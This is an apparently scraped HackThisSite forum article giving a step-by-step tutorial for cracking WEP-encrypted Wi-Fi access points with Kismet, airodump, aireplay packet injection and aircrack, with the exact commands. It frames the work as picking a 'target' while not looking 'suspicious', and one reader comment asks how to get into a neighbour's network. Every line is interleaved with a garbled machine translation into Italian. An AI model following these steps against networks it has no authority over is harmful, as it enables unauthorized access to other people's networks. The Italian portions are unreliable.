"Only two things are infinite, the universe and the human stupidity, and im not to sure about the former" - Albert Einstein "Solo due cose sono infinite, l'universo e la stupidità umana, e non nel mese di sicuro l'ex" - Albert Einstein
Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. Ok, questo è un tutorial che spiega come WEP fessure più codificato Access Point fuori là.The tools used will be as follows: Gli strumenti utilizzati saranno i seguenti:
Kismet (any working version) Kismet (qualsiasi versione di lavoro) >= Aireplay 2.2 beta > = 2.2 beta Aireplay >= Aircrack 2.1 > = 2.1 Aircrack
As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a). Per quanto riguarda le schede wireless, le consigliamo di qualsiasi Prisma, Orinoco, o Atheros schede basate su (io ho usato il D-Link 650 Rev.1a).
Getting Started: Guida introduttiva:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Vediamo, la prima cosa che stanno andando a voler fare è responsabile il tuo lappy verso l'alto (aireplay Aircrack fognatura e la batteria un po ') Poi si vanno a voler caricare il tuo preferito live CD (io ho usato Whoppix 2.7 finale) OS o Linux, poi inciampare in una WLAN codificato, utilizzare Kismet di farlo.Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico); Assicurarsi di aver configurato il tuo Kismet. Conf file correttamente per essere in grado di utilizzare la tua carta (kismet.conf individuare il file e aprirlo con il vostro editor di testo preferito, ho usato pico);
CODE CODICE # Sources are defined as: # Fonti sono definite come segue: # source=sourcetype,interface,name[,initialchannel] # Source = sourcetype, interfaccia, il nome [, initialchannel] # Source types and required drivers are listed in the README # Fonte tipi e driver necessari sono elencati nel file Leggimi # The initial channel is optional, if hopping is not enabled it can be used # Il primo canale è facoltativo, se la caccia non è abilitato può essere utilizzato # to set the channel the interface listens on. # Per impostare il canale l'interfaccia in ascolto su. # YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE # È necessario modificare questa sia la fonte che si desidera utilizzare source=orinoco,eth1,kismet source = Orinoco, eth1, Kismet #source=wlanng,wlan0,Prism # source = wlanng, wlan0, Prisma #source=kismet_drone,192.168.2.252:3501,kismet_drone # source = kismet_drone, 192.168.2.252:3501, kismet_drone
^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal). ^ ^ Che è un esempio di una parte del mio kismet.conf, che inizialmente era sbagliato per me, ho dovuto commentare la prima riga e togli il secondo (il mio nome del dispositivo senza fili è stata wlan0, si possono trovare su questo digitando 'iwconfig 'In un terminale). Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . Nota: Per trovare la vostra carta di chipset hanno un buon google sul modello del tuo numero di carta o tentare di controllo http://www.linux-wlan.org/docs/wlan_adapters.html.gz qui.A full list of supported chipsets can Un elenco completo dei chipset supportati possono be found on the Kismet website under Documentation. sono disponibili sul sito web sotto Kismet Documentazione.
Changed kismet.conf: Kismet.conf cambiato:
CODE CODICE # Sources are defined as: # Fonti sono definite come segue: # source=sourcetype,interface,name[,initialchannel] # Source = sourcetype, interfaccia, il nome [, initialchannel] # Source types and required drivers are listed in the README # Fonte tipi e driver necessari sono elencati nel file Leggimi # The initial channel is optional, if hopping is not enabled it can be used # Il primo canale è facoltativo, se la caccia non è abilitato può essere utilizzato # to set the channel the interface listens on. # Per impostare il canale l'interfaccia in ascolto su. # YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE # È necessario modificare questa sia la fonte che si desidera utilizzare #source=orinoco,eth1,kismet # source = Orinoco, eth1, Kismet source=wlanng,wlan0,Prism source = wlanng, wlan0, Prisma #source=kismet_drone,192.168.2.252:3501,kismet_drone # source = kismet_drone, 192.168.2.252:3501, kismet_drone
Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Salvare le modifiche apportate e tornare a un terminale ed eseguire 'Kismet', si dovrebbe caricare se si configd correttamente.Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N. Una volta che avete Kismet andare, avere una buona inciampare nei pressi di tua zona, per vedere se ha una WLAN WEP abilitato, Kismet dovrebbe avere una colonna vicino l'ESSID titolo con 'W' se ha WEP permesso avrà una Y, se non sarà una N.
Going in for the kill: Andando per uccidere il:
So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Quindi, ora che hai un obiettivo che si sta per assicurarsi di guardare dont sospette e hai almeno 15mins vale la pena di durata della batteria sinistra Razz.Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Rendere sicuro di sapere il canale di Access Point è il (sotto la CH cloumn in Kismet), e anche l'indirizzo MAC del punto di accesso da hiting 's' (per tipo), quindi scorrere verso il punto di accesso desiderato e poi digitando' i ' che vi dà informazioni dettagliate sul punto di accesso selezionato.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use: Prima di tutto si sta a voler impostare la propria scheda wireless a destra modalità, a seconda di ciò che dipende dal chipset quali comandi hai avuto modo di utilizzo:
CODE CODICE If you use madwifi, you may have to place the card in Se si utilizza madwifi, potrebbe essere necessario collocare la carta nella pure 802.11b mode first: puro 802.11b prima modalità: iwpriv ath0 mode 2 iwpriv ath0 mode 2
If you use wlan-ng, run Se si utilizza wlan-ng, eseguire ./wlanng.sh start wlan0 <channel> [comes with AirePlay2.2] . / wlanng.sh inizio wlan0 <channel> [viene fornito con AirePlay2.2]
Otherwise run: In caso contrario eseguire: iwconfig ath0 mode Monitor channel <channel> iwconfig ath0 modalità Monitor canale <channel> ifconfig ath0 up ifconfig fino ath0
Read the AirePlay2.2 readme for more info. Leggi la AirePlay2.2 readme per maggiori informazioni. Start by opening up another terminal window and cd into your aircrack directory and launch airodump: Start mediante l'apertura di un'altra finestra di terminale e cd in tuo Aircrack directory e lanciare airodump: Code: Codice: #./airodump #. / airodump [version crap] [versione crap] usage: ./airodump <wifi interface> <output filename> [mac filter] uso:. / airodump <wifi interface> <output filename> [mac filtro]
eg ad esempio ./airodump wlan0 linksys . / airodump wlan0 Linksys
The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Il filtro mac è usato quando si hanno più di un Access Point sullo stesso canale in una sola volta, in modo che abbiate 'jim_home' e 'Link' sia ESSID di punti di accesso sia sul canale 11 volesse afferrare l'indirizzo MAC di Access Punto di Kismet, da hiting 's' (per tipo), quindi scorrere verso il punto di accesso desiderato e poi digitando' i 'che vi dà informazioni dettagliate sul punto di accesso selezionato.Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Ok ora avete un flusso di pacchetti dal tuo obiettivo, si vede la colonna IV, che cosa sono quelli noti come 'debole chiave' pacchetti, vogliamo come molti di loro come si può ottenere (400K + è un bel numero Razz).Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. Ora ci accingiamo a catturare una 'debole chiave' dal pacchetto sulla rete ci sono e il targeting per andare a alluvione l'Access Point con esso nella speranza che abbiamo un sacco di 'debole chiave' inviato le risposte in modo che possiamo eventualmente crack della password.So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]): Così ora nella vostra finestra di altri terminali 'cd' nel tuo aireplay directory ed eseguire aireplay ( '. / Aireplay' [ritorno]):
CODE CODICE capture packets unless interface #1 is specified. cattura i pacchetti a meno che l'interfaccia # 1 è specificato. source options: fonte opzioni: -i : capture packet on-the-fly (default) -i: la cattura dei pacchetti on-the-fly (impostazione predefinita) -r file : extract packet from this pcap file -r file: estratto da questo pacchetto di file pcap filter options: Opzioni del filtro: -b bssid : MAC address, Access Point -b BSSID: indirizzo MAC, Access Point -d dmac : MAC address, Destination -d dmac: indirizzo MAC, la destinazione -s smac : MAC address, Source SMac-s: indirizzo MAC, Fonte -m len : minimum packet length, default: 40 m-len: lunghezza minima del pacchetto, di default: 40 -n len : maximum packet length, default: 512 -n len: lunghezza massima del pacchetto, di default: 512 -u type : fc, type - default: 2 = data u-tipo: FC, tipo - default: 2 = dati -v subt : fc, subtype - default: 0 = normal -v subt: FC, sottotipo - default: 0 = normale -t tods : fc, To DS bit - default: any -t tods: FC, Per DS po '- di default: qualsiasi -f fromds : fc, From DS bit - default: any -f fromds: FC, Da DS po '- di default: qualsiasi -w iswep : fc, WEP bit - default: 1 -w iswep: FC, bit WEP - default: 1 -y : don't ask questions, assume yes -y: non porre domande, può assumersi sì replay options: replay opzioni: -x nbpps : number of packets per second nbpps-x: numero di pacchetti per secondo -a bssid : set Access Point MAC address -uno BSSID: Access Point impostare l'indirizzo MAC -c dmac : set Destination MAC address -c dmac: impostare l'indirizzo MAC di destinazione -h smac : set Source MAC address -h SMac: Fonte impostare l'indirizzo MAC -o fc0 : set frame control[0] (hex) -o fc0: impostare cornice di controllo [0] (esadecimale) -p fc1 : set frame control[1] (hex) -p fc1: impostare cornice di controllo [1] (esadecimale) -k : turn chopchop attack on -k: girate chopchop attacco su
eg ad esempio ./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0 . / aireplay-b 00: FF: 00: FF: 00: FF-x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. Qui ci accingiamo a prendere un paio di pacchetti da Access Point con l'indirizzo MAC 00: FF: 00: FF: 00: FF fino a quando non prendere un 'debole chiave' pacchetto aireplay che poi ti chiederà se si desidera utilizzare per poi alluvione l'Access Point con quello del pacchetto.when it asks you if it can use one of the packets hit 'y' then return. quando ti chiede se può usare uno dei pacchetti colpito 'y', quindi andata e ritorno.If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Se Flick tornare al terminale con airodump in esecuzione, si dovrebbe vedere i pacchetti che vengono catturati aumenterà di una grande quantità e che con il IV pacchetti dovrebbero essere anche dannatamente aumento piuttosto rapido e, se tutto è andato bene in circa 10mins si dovrebbe avere abbastanza pacchetti per poi gettare in Aircrack.Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]): Ok in modo che si desidera almeno 400K + IV pacchetti (più sono e meglio è), una volta ottenuto un decente importo colpito 'ctrl + c' in entrambe le finestre di terminale, sia di porre fine aireplay e airodump, ora 'cd' nella tua directory di Aircrack ed eseguire Aircrack ( '. / Aircrack' [ritorno]):
CODE CODICE aircrack 2.1 - (C) 2004 Christophe Devine Aircrack 2.1 - (C) 2004 Christophe Devine usage: ./aircrack [options] <pcap file> <pcap file> ... uso:. / Aircrack [opzioni] <pcap file> <pcap file> ... -d <start> : debug - specify beginning of the key -d <start>: debug - specificare all'inizio del tasto -f <fudge> : bruteforce fudge factor (default: 2) -f <fudge>: bruteforce Fudge fattore (default: 2) -m <maddr> : MAC address to filter usable packets -m <maddr>: indirizzo MAC utilizzabile per filtrare i pacchetti -n <nbits> : WEP key length: 64 / 128 / 256 / 512 -n <nbits>: lunghezza della chiave WEP: 64 / 128 / 256 / 512 -p <nfork> : SMP support: # of processes to start -p <nfork>: il supporto multiprocessore: # di processi per avviare -q <quiet> : Quiet mode (less print more speed) <quiet>-q: modalità Quiet (meno velocità di stampa più)
eg ad esempio ./aircrack -n 128 linksys.cap . / Aircrack-n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. ciò che vi ho fatto è stato fissato Aircrack di leggere il mio pacchetto file chiamato linksys.cap (ciò che crea airodump) e dicendo Aircrack è stata una cifratura a 128 bit.If all goes well you will get the key in nice red text. Se tutto va bene vedrete il tasto rosso nel bel testo.
KEY FOUND: [ Pwn3d ] CHIAVE TROVATA: [Pwn3d]
Happy WarDriving. Happy wardriving.
(Please reply with any errors in my tutorial) (Si prega di rispondere con gli eventuali errori nel mio tutorial) Theory Teoria A little theory first. Un po 'di teoria prima.WEP is a really crappy and old encryption technique to secure a wireless connection. WEP è un crappy veramente vecchio e tecnica di crittografia per garantire una connessione wireless.A 3-byte vector, called an Initialization Vector or IV, is perpended onto packets and its based on a pre-shared key that all the authenticated clients know... 3 byte vettore, chiamato uno Vettore di Inizializzazione o IV, è perpended su pacchetti e la sua basa su una chiave già condivisa che tutti i clienti autenticati sapere ...think of it as the network key you need to authenticate. pensare come chiave di rete è necessario autenticarsi. Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the key space to check and brute force becomes a realistic proposition. Beh, se sulla sua (quasi) ogni pacchetto generato dal cliente o AP, quindi se vogliamo raccogliere abbastanza di loro, come a poche centinaia di migliaia, dovremmo essere in grado di ridurre drasticamente la chiave per controllare lo spazio e la forza bruta diventa una proposta realistica.
Cast your vote on this article Cast il vostro voto su questo articolo *Note: the order of the votes has been reversed. * Nota: l'ordine delle votazioni è stato invertito.
kismet requires the purchasing of a hardware device to use it... Kismet richiede l'acquisto di un dispositivo hardware per utilizzare ... "These binaries enable native capture for AirPcap devices from Cace only. Native capture is not possible via any other card or driver inside Windows. These packages will ONLY WORK with Kismet remote drones and Cace AirPcap devices." "Questi binari consentire nativo di cattura per AirPcap dispositivi Cace da solo. Nativo di cattura non è possibile tramite una qualsiasi altra carta o il driver all'interno di Windows. Questi pacchetti funzionano solo con telecomando Kismet fuchi e Cace AirPcap dispositivi".
intindo - 12:16 am Sunday March 16th, 2008intindo - 12:16 am Domenica marzo 16, 2008
I would give the article a 10 for accuracy and you a 1 for plagiarism but I chose not to vote because many people can benefit from this information. Vorrei dare l'articolo 10 per la precisione e un 1 per plagio ma io ho scelto di non votare, perché molte persone possono trarre beneficio da questo tipo di informazioni.Next time don't cut the author's ownership from the document. La prossima volta non tagliare l'autore della proprietà dal documento.This was posted nearly 3 years ago: http://www.datastronghold.com/archive/t15149.html Questo è stato postato circa 3 anni fa: http://www.datastronghold.com/archive/t15149.html
I didn't get it from there, I got it from Wikipedia and its not plagiarism because Wiki is based on anyone post any shit if its true are not plagiarized or not so... Non l'ho ricevuto da lì, ho ricevuto da Wikipedia e il suo plagio non perché Wiki si basa su chiunque pubblicare merda se la sua vera plagiarized non sono o non così ... This is for informational purposes only! Questo è solo a scopo informativo! POINT PROVEN POINT BLACK... Punto provata punto nero ...
If it's from Wikipedia, you state that it's from Wikipedia. Se è da Wikipedia, è stato che è da Wikipedia.
If you are writing a paper, and Wikipedia is one of your sources, you say it's one of your sources, not act like you never got any information from Wikipedia about it that you used in your paper. Se si sta scrivendo un documento, e Wikipedia è una delle sue fonti, si dice una delle sue fonti, non agiscono come non hai mai avuto tutte le informazioni da Wikipedia al riguardo che è stato usato nel suo documento.
Yes I did state that I got it from Wikipedia and whats wrong about that? Sì ho fatto affermare che ho ricevuto da Wikipedia e che cosa sbagliata su questo? Wikipedia is based on some ordinary person having an account just posting or writing about shit that can be true or not, So thats one reason why wikipedia shouldn't be your first source to find information. Wikipedia si basa su alcuni ordinarie persona che abbia un conto solo di distacco o per iscritto circa merda che può essere vero o no, quindi thats uno dei motivi per cui Wikipedia non dovrebbe essere la vostra prima fonte per trovare informazioni.
Leafman - 08:27 am Monday March 24th, 2008Leafman - 08:27 am Lunedi 24 marzo 2008
Their point would be that you don't pretend you wrote it all out of your head. Il loro punto è che lei non pretendo che lei ha scritto tutto del vostro capo.
That you say in the beginning or the end Lei dice che all'inizio o alla fine that you got it or most of it from wikipedia. che si abbia o la maggior parte di essa da Wikipedia.there's a big difference there ;-) c'è una grande differenza c'è ;-)
Karec - 06:44 pm Wednesday March 26th, 2008Karec - 06:44 pm Mercoledì Marzo 26th, 2008
I gave this article a five, first off you didn't state anywhere in the article you got most of the information in wikipedia. Mi ha dato questo articolo a cinque, in primo luogo al largo non hai stato ovunque in questo articolo si ha la maggior parte delle informazioni in Wikipedia.If you decided to turn something like this into any respectable institution of education they would give you a big fat zero on this for plagiarism. Se si decide di trasformare qualcosa di simile in qualsiasi rispettabile istituto di istruzione che si darebbe un grosso grasso zero su questo per plagio.
Greendestiny - 05:25 pm Thursday April 03rd, 2008Greendestiny - Giovedi 05:25 pm aprile 03a, 2008
im having difficulty finding the programs mentioned and just wondered if aircrack-ng will work aswell. im avere difficoltà a trovare i programmi citati e solo chiesto se Aircrack-ng funziona pure.
ckeboss - 12:50 am Friday April 04th, 2008ckeboss - 12:50 am Venerdì aprile 04a, 2008
I am on a macbook, running lepored. Sono su un MacBook, in esecuzione lepored.I tryed kisMAC, but it does not support my airport extreme card. I tryed kisMAC, ma non supporta la mia scheda AirPort Extreme.Any usb thing I can try? Usb qualsiasi cosa che posso provare?
swaino777 - 08:03 am Monday April 07th, 2008swaino777 - 08:03 am Lunedi aprile 07a, 2008
Can anyone give me the way to hack it on a sony psp as i want to hack into my neighbours wireless internet so i can use it on my psp. Chiunque può darmi il modo di hack su una Sony PSP come voglio hack miei vicini in internet senza fili in modo che io possa usare sulla mia PSP.
grooviex - 04:42 am Saturday May 17th, 2008grooviex - 04:42 am Sabato 17 Maggio 2008
for cracking wep is it only for laptop? per il cracking WEP è solo per il portatile?using desktop with network adapter still can crack?? utilizzando desktop con scheda di rete è ancora in grado di crack?i find alot of cracking wep with laptop only cant find any desktop can anyone tell mi?? trovare un sacco di cracking WEP con computer portatile solo cant trovato nessun desktop può dire chiunque mi?if can where can i find the steps for cracking wep using desktop... se può Dove posso trovare la procedura per il cracking WEP utilizzando desktop ...
Twitch - 11:08 am Sunday August 10th, 2008Twitch - ore 11:08 Domenica 10 agosto, 2008
It's for anything that can support the software and has the hardware for it. E 'per tutto ciò che può supportare il software e l'hardware ha per essa.If you have a suitable wifi card, then why wouldn't it work? Se avete una scheda wifi adatto, quindi perché non funziona? Folks, please stop asking to be spoon-fed :/ Credimi, ti invitiamo a interrompere chiedendo di essere nutriti con cucchiaio: /
This site is the collective work of the HackThisSite staff. Questo sito è il contratto collettivo di lavoro del personale HackThisSite.Please don't reproduce in part or whole without permission. Si prega di non riprodurre in parte o in tutto senza permesso. Page Generated: Mon, 01 Dec 2008 20:14:54 -0500 Exec: 10 Pagina Generata: lun, 01 dicembre 2008 20:14:54 -0500 Esec: 10 Page loaded in 0.17487 seconds!Pagina caricata in 0,17487 secondi!
Nice, and thanks. Nizza, e grazie.